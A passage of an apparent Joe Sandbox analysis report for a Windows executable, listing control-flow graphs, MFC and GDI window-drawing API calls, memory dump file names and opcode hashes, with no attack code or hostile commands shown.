                                                                                          • 6CEFFEB0.MFC42(?), ref: 00409FAD
                                                                                          • 73A24D40.GDI32(?,?,?,?,?,?,?,?,00CC0020,?,?), ref: 00409FFA
                                                                                          • 6CF38160.MFC42(?,00000000,?), ref: 0040A011
                                                                                          • 6CF38160.MFC42(?,?,?), ref: 0040A021
                                                                                          • 6CF37850.MFC42(?), ref: 0040A049
                                                                                          • 6CF01660.MFC42(?), ref: 0040A05E
                                                                                          • 6CF015D0.MFC42(?), ref: 0040A06F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1624171238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1624162321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1624181548.000000000040C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1624190626.000000000040E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1624209463.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1624218839.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_nOZ2Oqnzbz.jbxd
                                                                                          Similarity
                                                                                          • API ID: F38160$E720F015F016F01660F37140F376F37850F38460F387ModeRectWindow
                                                                                          • String ID:
                                                                                          • API String ID: 4069818952-0
                                                                                          • Opcode ID: 24ead7c7138b67f3a46476f4c84bfb2031621dddb6359352eea06206daee3e16
                                                                                          • Instruction ID: 387955213cf341242af21f02e85b7fd3331607f5cb7a19bffeb898acdc1f93f5
                                                                                          • Opcode Fuzzy Hash: 24ead7c7138b67f3a46476f4c84bfb2031621dddb6359352eea06206daee3e16
                                                                                          • Instruction Fuzzy Hash: 997127711183409FC314DF64C88496FBBF8EBC9704F108A2EF6A693291DB79E905CB96
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 1325 404360-4044a9 call 4048b0 6CF37080 6CF37160 6CEF2DD0 1328 404552-40455e 1325->1328 1329 4044af-4044b1 1325->1329 1331 404560-404572 CreatePolygonRgn 6CF376C0 1328->1331 1332 4045cb-4045d4 CreatePolygonRgn 6CF376C0 1328->1332 1329->1328 1330 4044b7-4044bd 1329->1330 1330->1328 1334 4044c3-4044c7 1330->1334 1335 404574-404576 1331->1335 1336 404578 1331->1336 1333 4045d9-4045db 1332->1333 1338 4045e6-404667 6CF37850 * 4 1333->1338 1339 4045dd-4045e3 6CEF2C70 1333->1339 1340 4044cd-4044e3 1334->1340 1341 40454e 1334->1341 1337 40457b-4045c9 CombineRgn CreatePolygonRgn 6CF376C0 CombineRgn 1335->1337 1336->1337 1337->1333 1339->1338 1342 4044e9-404548 _ftol * 2 1340->1342 1341->1328 1342->1342 1343 40454a-40454c 1342->1343 1343->1341
                                                                                          APIs
                                                                                          • 6CF37080.MFC42(?), ref: 004043C4
                                                                                          • 6CF37160.MFC42(00000005,00000000,00000000,?), ref: 004043D9
                                                                                          • 6CEF2DD0.MFC42(?,00000005,00000000,00000000,?), ref: 00404499
                                                                                          • _ftol.MSVCRT ref: 0040450A
                                                                                          • _ftol.MSVCRT ref: 00404538
                                                                                          • CreatePolygonRgn.GDI32(00000000,?,00000001), ref: 00404560
                                                                                          • 6CF376C0.MFC42(00000000), ref: 0040456B
                                                                                          • CombineRgn.GDI32(?,?,00000000,00000005), ref: 00404585
                                                                                          • CreatePolygonRgn.GDI32(00000000,?,00000001), ref: 0040458F
                                                                                          • 6CF376C0.MFC42(00000000), ref: 0040459A
                                                                                          • CombineRgn.GDI32(?,?,?,00000002), ref: 004045C3
                                                                                          • CreatePolygonRgn.GDI32(00000000,?,00000001), ref: 004045CB
                                                                                          • 6CF376C0.MFC42(00000000), ref: 004045D4
                                                                                          • 6CEF2C70.MFC42(00000000,00000000), ref: 004045DE
                                                                                          • 6CF37850.MFC42 ref: 004045FB
                                                                                          • 6CF37850.MFC42 ref: 00404619
                                                                                          • 6CF37850.MFC42 ref: 00404632
                                                                                          • 6CF37850.MFC42 ref: 0040464E
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1624171238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1624162321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1624181548.000000000040C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1624190626.000000000040E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1624209463.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1624218839.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_nOZ2Oqnzbz.jbxd
                                                                                          Similarity
                                                                                          • API ID: F37850$CreateF376Polygon$Combine_ftol$F37080F37160
                                                                                          • String ID:
                                                                                          • API String ID: 339702656-0
                                                                                          • Opcode ID: 76b59d60c353cbaa1d95a5d0ad8cfcc92339eaeaa5065b38da4cc76092f4088c
                                                                                          • Instruction ID: 39bea9fad0b66382f5372ed494b3add627d4de448e91ddc4441a9f07906a4bc8
                                                                                          • Opcode Fuzzy Hash: 76b59d60c353cbaa1d95a5d0ad8cfcc92339eaeaa5065b38da4cc76092f4088c
                                                                                          • Instruction Fuzzy Hash: B09156B19083419FC310DF29C985A5BBBE4FFC4750F018A2EF999A7291DB34D814CB86
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 1344 403e10-403f48 call 4048b0 * 2 6CF37080 6CF37160 6CEF2DD0 1349 403fd1-403fdd 1344->1349 1350 403f4e-403f50 1344->1350 1352 40404a-404053 CreatePolygonRgn 6CF376C0 1349->1352 1353 403fdf-403ff1 CreatePolygonRgn 6CF376C0 1349->1353 1350->1349 1351 403f52-403f56 1350->1351 1351->1349 1354 403f58-403f6e 1351->1354 1357 404058-40405a 1352->1357 1355 403ff3-403ff5 1353->1355 1356 403ff7 1353->1356 1358 403f74-403fcb _ftol * 2 1354->1358 1359 403ffa-404048 CombineRgn CreatePolygonRgn 6CF376C0 CombineRgn 1355->1359 1356->1359 1360 404065-4040e6 6CF37850 * 4 1357->1360 1361 40405c-404062 6CEF2C70 1357->1361 1358->1358 1362 403fcd-403fcf 1358->1362 1359->1357 1361->1360 1362->1349
                                                                                          APIs
                                                                                          • 6CF37080.MFC42(?), ref: 00403E71
                                                                                          • 6CF37160.MFC42(00000005,00000000,00000000,?), ref: 00403EA1
                                                                                          • 6CEF2DD0.MFC42(?,00000005,00000000,00000000,?), ref: 00403F3C
                                                                                          • _ftol.MSVCRT ref: 00403F95
                                                                                          • _ftol.MSVCRT ref: 00403FBF
                                                                                          • CreatePolygonRgn.GDI32(00000000,?,00000001), ref: 00403FDF
                                                                                          • 6CF376C0.MFC42(00000000), ref: 00403FEA
                                                                                          • CombineRgn.GDI32(?,?,00000000,00000005), ref: 00404004
                                                                                          • CreatePolygonRgn.GDI32(00000000,?,00000001), ref: 0040400E
                                                                                          • 6CF376C0.MFC42(00000000), ref: 00404019
                                                                                          • CombineRgn.GDI32(?,?,?,00000002), ref: 00404042
                                                                                          • CreatePolygonRgn.GDI32(00000000,?,00000001), ref: 0040404A
                                                                                          • 6CF376C0.MFC42(00000000), ref: 00404053
                                                                                          • 6CEF2C70.MFC42(00000000,00000000), ref: 0040405D
                                                                                          • 6CF37850.MFC42 ref: 0040407A
                                                                                          • 6CF37850.MFC42 ref: 00404098
                                                                                          • 6CF37850.MFC42 ref: 004040B1
                                                                                          • 6CF37850.MFC42 ref: 004040CD
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1624171238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1624162321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1624181548.000000000040C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1624190626.000000000040E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1624209463.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1624218839.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_nOZ2Oqnzbz.jbxd
                                                                                          Similarity
                                                                                          • API ID: F37850$CreateF376Polygon$Combine_ftol$F37080F37160
                                                                                          • String ID:
                                                                                          • API String ID: 339702656-0
                                                                                          • Opcode ID: dbf15af777a9242a6ab4e2c7a6b65f1fdb691b85148fe195744af21802976117
                                                                                          • Instruction ID: d78316a0bae83b4357ed0e5d5a94130920efe7575c7a00bd962797de7769c8fd
                                                                                          • Opcode Fuzzy Hash: dbf15af777a9242a6ab4e2c7a6b65f1fdb691b85148fe195744af21802976117
                                                                                          • Instruction Fuzzy Hash: 189179B1A083419FC310DF25C985A5BBBF4FF88714F118A2DF99AA7291DB34D914CB86
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 1363 4040f0-404202 6CF37080 6CF37160 6CEF2DD0 1364 404208-40420a 1363->1364 1365 4042f9-4042fb 1363->1365 1366 404210-404216 1364->1366 1367 404306-404351 6CF37850 * 2 1364->1367 1365->1367 1368 4042fd-404303 6CEF2C70 1365->1368 1366->1365 1369 40421c-404220 1366->1369 1368->1367 1370 404222-404238 1369->1370 1371 40429d-4042f5 6CF381F0 * 2 6CF38500 PolyPolygon 6CF381F0 * 2 1369->1371 1372 40423e-404297 _ftol * 2 1370->1372 1371->1365 1372->1372 1373 404299-40429b 1372->1373 1373->1371
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1624171238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1624162321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1624181548.000000000040C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1624190626.000000000040E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1624209463.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1624218839.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_nOZ2Oqnzbz.jbxd
                                                                                          Similarity
                                                                                          • API ID: F381$F37850_ftol$F37080F37160F38500PolyPolygon
                                                                                          • String ID:
                                                                                          • API String ID: 3523466669-0
                                                                                          • Opcode ID: 2b2e73ee56ccb52b1001f3b0391d252d54c9b1f95d3d559f81bec7f6def80bc2
                                                                                          • Instruction ID: 188a373362c9c2a19894e084889eeb25583b541a2b65023392c336bd3c41df6f
                                                                                          • Opcode Fuzzy Hash: 2b2e73ee56ccb52b1001f3b0391d252d54c9b1f95d3d559f81bec7f6def80bc2
                                                                                          • Instruction Fuzzy Hash: BB7146B16087029FC300DF15C580A5AFBE5FFC8714F008A2EF895A3295DB34D925CB96
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 1374 4039c0-403ad3 6CF37080 6CF37160 6CEF2DD0 1375 403ad9-403adb 1374->1375 1376 403bbc-403bbe 1374->1376 1378 403bc9-403c14 6CF37850 * 2 1375->1378 1379 403ae1-403ae5 1375->1379 1377 403bc0-403bc6 6CEF2C70 1376->1377 1376->1378 1377->1378 1380 403b62-403bb8 6CF381F0 * 2 6CF38500 Polygon 6CF381F0 * 2 1379->1380 1381 403ae7-403afd 1379->1381 1380->1376 1382 403b03-403b5c _ftol * 2 1381->1382 1382->1382 1383 403b5e-403b60 1382->1383 1383->1380
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1624171238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1624162321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1624181548.000000000040C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1624190626.000000000040E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1624209463.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1624218839.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_nOZ2Oqnzbz.jbxd
                                                                                          Similarity
                                                                                          • API ID: F381$F37850_ftol$F37080F37160F38500Polygon
                                                                                          • String ID:
                                                                                          • API String ID: 1715826439-0
                                                                                          • Opcode ID: 6a4d64cee6b4afaafe777f2e8d15a49c18efd186f2a01d640e6d192dcb17d5eb
                                                                                          • Instruction ID: a31888a28c910781cb5a6b2b58f142157f6f74c163650217d03e4cb0f708ac09
                                                                                          • Opcode Fuzzy Hash: 6a4d64cee6b4afaafe777f2e8d15a49c18efd186f2a01d640e6d192dcb17d5eb
                                                                                          • Instruction Fuzzy Hash: 647175B1A087419FC304DF25C580A0ABBF5FFC8704F108A2DF899A3295DB35D919CB8A
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 1384 40b10f-40b184 __set_app_type __p__fmode __p__commode call 40b295 1387 40b192-40b1e9 call 40b280 _initterm __getmainargs _initterm 1384->1387 1388 40b186-40b191 __setusermatherr 1384->1388 1391 40b225-40b228 1387->1391 1392 40b1eb-40b1f3 1387->1392 1388->1387 1393 40b202-40b206 1391->1393 1394 40b22a-40b22e 1391->1394 1395 40b1f5-40b1f7 1392->1395 1396 40b1f9-40b1fc 1392->1396 1397 40b208-40b20a 1393->1397 1398 40b20c-40b21d GetStartupInfoA 1393->1398 1394->1391 1395->1392 1395->1396 1396->1393 1399 40b1fe-40b1ff 1396->1399 1397->1398 1397->1399 1400 40b230-40b232 1398->1400 1401 40b21f-40b223 1398->1401 1399->1393 1402 40b233-40b23e GetModuleHandleA call 40b2a2 1400->1402 1401->1402 1404 40b243-40b260 exit _XcptFilter 1402->1404
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1624171238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1624162321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1624181548.000000000040C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1624190626.000000000040E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1624209463.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1624218839.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_nOZ2Oqnzbz.jbxd
                                                                                          Similarity
                                                                                          • API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
                                                                                          • String ID:
                                                                                          • API String ID: 801014965-0
                                                                                          • Opcode ID: 4e1e83045593532e3e54d4086fe12bd443ea795f31f0b1fa31bee2aa57048aae
                                                                                          • Instruction ID: 92e6429448b312161c6c86a2e6f2100586677b1d17cdbc89596afef87365b123
                                                                                          • Opcode Fuzzy Hash: 4e1e83045593532e3e54d4086fe12bd443ea795f31f0b1fa31bee2aa57048aae
                                                                                          • Instruction Fuzzy Hash: 68416FB5800344EFDB209FA5D889AAE7BB8EB09714F20067FE551A72E1D7784841CB9C
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                            • Part of subcall function 00401000: CopyRect.USER32(?,0040E020), ref: 0040100D
                                                                                          • _ftol.MSVCRT ref: 00409CF7
                                                                                          • _ftol.MSVCRT ref: 00409D0E
                                                                                          • _ftol.MSVCRT ref: 00409D2B
                                                                                          • 6CF39B80.MFC42(?,?,00000000,?,00000000), ref: 00409D78
                                                                                          • GetWindowRect.USER32(?,?), ref: 00409D86
                                                                                          • 6CEFE6C0.MFC42(?), ref: 00409D93
                                                                                            • Part of subcall function 00402500: CopyRect.USER32(?,0040E020), ref: 00402516
                                                                                            • Part of subcall function 00402500: CopyRect.USER32(?,0040E020), ref: 0040253E
                                                                                            • Part of subcall function 00402500: CopyRect.USER32(?,0040E020), ref: 0040255E
                                                                                            • Part of subcall function 00402500: CopyRect.USER32(?,0040E020), ref: 0040257E
                                                                                            • Part of subcall function 00402500: CopyRect.USER32(?,0040E020), ref: 0040259E
                                                                                            • Part of subcall function 00402500: CopyRect.USER32(?,0040E020), ref: 004025BE
                                                                                            • Part of subcall function 00402500: CopyRect.USER32(?,0040E020), ref: 004025DE
                                                                                            • Part of subcall function 00402500: CopyRect.USER32(?,0040E020), ref: 004025FE
                                                                                            • Part of subcall function 00402500: CopyRect.USER32(?,0040E020), ref: 0040261E
                                                                                          • SetWindowRgn.USER32(?,0040C340,00000001), ref: 00409DBF
                                                                                          • SetCapture.USER32(?), ref: 00409DC9
                                                                                          • 6CEFCE30.MFC42(00000000), ref: 00409DD0
                                                                                          • 6CF37850.MFC42(?,?,?,?,?,?,?,00000000), ref: 00409DE9
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1624171238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1624162321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1624181548.000000000040C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1624190626.000000000040E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1624209463.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1624218839.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_nOZ2Oqnzbz.jbxd
                                                                                          Similarity
                                                                                          • API ID: Rect$Copy$_ftol$Window$CaptureF37850
                                                                                          • String ID:
                                                                                          • API String ID: 3059804316-0
                                                                                          • Opcode ID: 4a7094b539b862f338539457f0d8793b4a741916dd4dc3ebb93e6d5d52ff0bfe
                                                                                          • Instruction ID: 353ad75620bb99855249955aa37f7dffc4285601670c8d5eecd51fb0f0ccdc6c
                                                                                          • Opcode Fuzzy Hash: 4a7094b539b862f338539457f0d8793b4a741916dd4dc3ebb93e6d5d52ff0bfe
                                                                                          • Instruction Fuzzy Hash: 1F416DB12187068FC304DF7AC98595BBBE8FBC8704F044A3EB49993381DB74E9098B56
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1624171238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1624162321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1624181548.000000000040C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1624190626.000000000040E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1624209463.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1624218839.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_nOZ2Oqnzbz.jbxd
                                                                                          Similarity
                                                                                          • API ID: F381_ftol$F37160F37850Polyline
                                                                                          • String ID:
                                                                                          • API String ID: 2981364783-0
                                                                                          • Opcode ID: 65c356e9e78dd02551586dc06fe35886212c27d2ac6a9610dbfe3a7d5aa395d8
                                                                                          • Instruction ID: 67acb76490eedac4ac0366a0d9b5dcd37d884ec233737b967b4c57c730f1dca4
                                                                                          • Opcode Fuzzy Hash: 65c356e9e78dd02551586dc06fe35886212c27d2ac6a9610dbfe3a7d5aa395d8
                                                                                          • Instruction Fuzzy Hash: 1E518DB1A08702ABC301DF15C580A5AB7F5FF88714F118A1DF895A3395EB31E829CBD6
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          • GetWindowRect.USER32(?,?), ref: 0040A97F
                                                                                          • _ftol.MSVCRT ref: 0040A9D4
                                                                                          • 6CF39B80.MFC42(?,?,00000000,?,00000001), ref: 0040AA03
                                                                                          • GetWindowRect.USER32(?,?), ref: 0040AA11
                                                                                          • 6CEFE6C0.MFC42(?,?,?,?,?,?,?,?,?,?,?,?,0040B670,000000FF), ref: 0040AA1A
                                                                                          • SetWindowRgn.USER32(?,0040C340,00000001), ref: 0040AA45
                                                                                          • ClientToScreen.USER32(?,?), ref: 0040AA5D
                                                                                          • 6CF023F0.MFC42(00000000,?,?,00000000,00000000,00000005), ref: 0040AA7E
                                                                                          • 6CF37850.MFC42(?,?,00000000,?,?,00000000,00000000,00000005), ref: 0040AAA5
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1624171238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1624162321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1624181548.000000000040C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1624190626.000000000040E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1624209463.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1624218839.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_nOZ2Oqnzbz.jbxd
                                                                                          Similarity
                                                                                          • API ID: Window$Rect$ClientF023F37850Screen_ftol
                                                                                          • String ID:
                                                                                          • API String ID: 706562457-0
                                                                                          • Opcode ID: b998918826c77febf2a25c4be3886caa5153053d104f383c60fb6be50d5108d4
                                                                                          • Instruction ID: a66530a9fee688cda4384b7b61b220c0551d436bf9aef3ce9762855fe69dfb7b
                                                                                          • Opcode Fuzzy Hash: b998918826c77febf2a25c4be3886caa5153053d104f383c60fb6be50d5108d4
                                                                                          • Instruction Fuzzy Hash: 58413C752047059FC714DF25C98492BB7E9FBC8B04F004A2EF98693790DB38E909CBA6
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1624171238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1624162321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1624181548.000000000040C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1624190626.000000000040E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1624209463.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1624218839.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_nOZ2Oqnzbz.jbxd
                                                                                          Similarity
                                                                                          • API ID: _ftol$CreateF376F37850PolygonRegion
                                                                                          • String ID:
                                                                                          • API String ID: 3457974096-0
                                                                                          • Opcode ID: 17b7e62d37637a2d73482e15072a4be556ec02c4b51384e8a89ed16f1ffde3de
                                                                                          • Instruction ID: bbc22f1e7c48a6dab8c73f5009b7f3ca445a8864c2917b6fdd274eb9f33cd00a
                                                                                          • Opcode Fuzzy Hash: 17b7e62d37637a2d73482e15072a4be556ec02c4b51384e8a89ed16f1ffde3de
                                                                                          • Instruction Fuzzy Hash: FF5113B5A087029FC300DF25C58491ABBF4FF88750F118A6EF895A2391EB35D925CB86
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          • 73A24D40.GDI32(?,?,00000001,?,?,00000000,?,00000001,00CC0020), ref: 0040A0F7
                                                                                          • 6CF38160.MFC42(?,?,?,?,?,?,?,?,?,?,0040B56B,000000FF), ref: 0040A10A
                                                                                          • 6CF38160.MFC42(?,?,?,?,?,?,?,?,?,?,0040B56B,000000FF), ref: 0040A119
                                                                                          • 6CF37850.MFC42(?,?,?,?,?,?,?,?,0040B56B,000000FF), ref: 0040A13A
                                                                                          • 6CF01660.MFC42(?,?,?,?,?,?,?,?,0040B56B,000000FF), ref: 0040A14F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1624171238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1624162321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1624181548.000000000040C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1624190626.000000000040E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1624209463.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1624218839.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_nOZ2Oqnzbz.jbxd
                                                                                          Similarity
                                                                                          • API ID: F38160$F01660F37850
                                                                                          • String ID:
                                                                                          • API String ID: 526543990-0
                                                                                          • Opcode ID: 036a40311f4159b16b61297708d4b3e6f18bf612af67d3e89011d4f15b4a3778
                                                                                          • Instruction ID: 18dcffc14f19134e82b589f7aa1d445acb49fadbf1b57fedb0062a3dc7b3293e
                                                                                          • Opcode Fuzzy Hash: 036a40311f4159b16b61297708d4b3e6f18bf612af67d3e89011d4f15b4a3778
                                                                                          • Instruction Fuzzy Hash: F4214F75200741DFC724DF59C984A27F7E8EB88B10F108A2EE5A697781D778E8058BA5
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                            • Part of subcall function 00409C60: 6CF30310.MFC42(00000064,00000000), ref: 00409C67
                                                                                          • ReleaseCapture.USER32 ref: 0040A841
                                                                                          • GetWindowRect.USER32(?,?), ref: 0040A850
                                                                                          • 6CF309F0.MFC42 ref: 0040A8AA
                                                                                          • 6CEFFEB0.MFC42 ref: 0040A8E9
                                                                                          • 6CF303E0.MFC42 ref: 0040A8FD
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1624171238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1624162321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1624181548.000000000040C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1624190626.000000000040E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1624209463.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1624218839.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_nOZ2Oqnzbz.jbxd
                                                                                          Similarity
                                                                                          • API ID: CaptureF303F30310F309RectReleaseWindow
                                                                                          • String ID:
                                                                                          • API String ID: 3990807431-0
                                                                                          • Opcode ID: 6e4fc3edfd80a79553657441def683f192502d6496bb5d27d1bf8310f2073b0a
                                                                                          • Instruction ID: 631f892069c71037f24c0449ce0317af8abbe6bb1c63e0507df2ec47cffd6435
                                                                                          • Opcode Fuzzy Hash: 6e4fc3edfd80a79553657441def683f192502d6496bb5d27d1bf8310f2073b0a
                                                                                          • Instruction Fuzzy Hash: 2921F9B6904741CFC224EF29C441A6AB7E4FB88714F108E2FE09693B91CB789406DF57
                                                                                          Uniqueness

